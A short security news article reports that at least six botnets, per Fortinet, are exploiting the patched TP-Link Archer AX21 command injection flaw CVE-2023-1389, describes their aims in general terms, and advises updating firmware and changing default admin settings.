TP-Link Routers Targeted by Botnets Exploiting One-Year-Old Vulnerability

Various malicious botnet operations have been found targeting TP-Link Archer AX21 routers using a severe security flaw first reported and patched last year. The vulnerability, identified as CVE-2023-1389, involves an unauthenticated command injection issue that could be accessed via the router’s web management interface.

This flaw was initially discovered by researchers in January 2023, and promptly reported to TP-Link through the Zero-Day Initiative (ZDI). Following the discovery, TP-Link released necessary firmware updates in March 2023 to mitigate the risk. However, details on how to exploit the flaw were soon made public through proof-of-concept code, raising concerns.

The Botnets Exploiting the Flaw

Recent warnings from cybersecurity firm Fortinet have highlighted a dramatic spike in the exploitation of this vulnerability, with malicious activities attributed to at least six different botnet groups. 

CVE-2023-1389 activity (Source: Fortinet)

According to Fortinet, the daily attempts to exploit this flaw have occasionally reached between 40,000 and 50,000 since March 2024. These botnets are not only varied in their origins but also in their methods of attack:

• AGoent and Moobot both aim to download and execute malicious ELF files from remote servers to launch DDoS attacks and then remove any trace of their activity.

A Gafgyt variant and Miori use similar tactics for persistent connections and brute force attacks, respectively.

• The Mirai variants and Condi employ scripts that disrupt packet analysis tools and system processes to avoid detection and enhance their persistence on the infected devices.

Fortinet’s reports suggest that despite TP-Link’s efforts to secure the devices through firmware updates, many users remain vulnerable due to outdated firmware versions.

How to Protect Your TP-Link Router

Users of the TP-Link Archer AX21 routers should ensure their firmware is up-to-date. Following the manufacturer’s step-by-step guide to update your router’s firmware is the best way to protect against these vulnerabilities. 

In addition, users should consider changing the default admin passwords and disabling any unnecessary web access to the administration panel in an effort to strengthen their security posture.

Final Word

Staying informed about the latest cybersecurity threats and taking proactive steps to secure devices is more important than ever. Updating your router’s firmware and changing default settings are quick steps that go a long way in protecting you from unwanted intruders.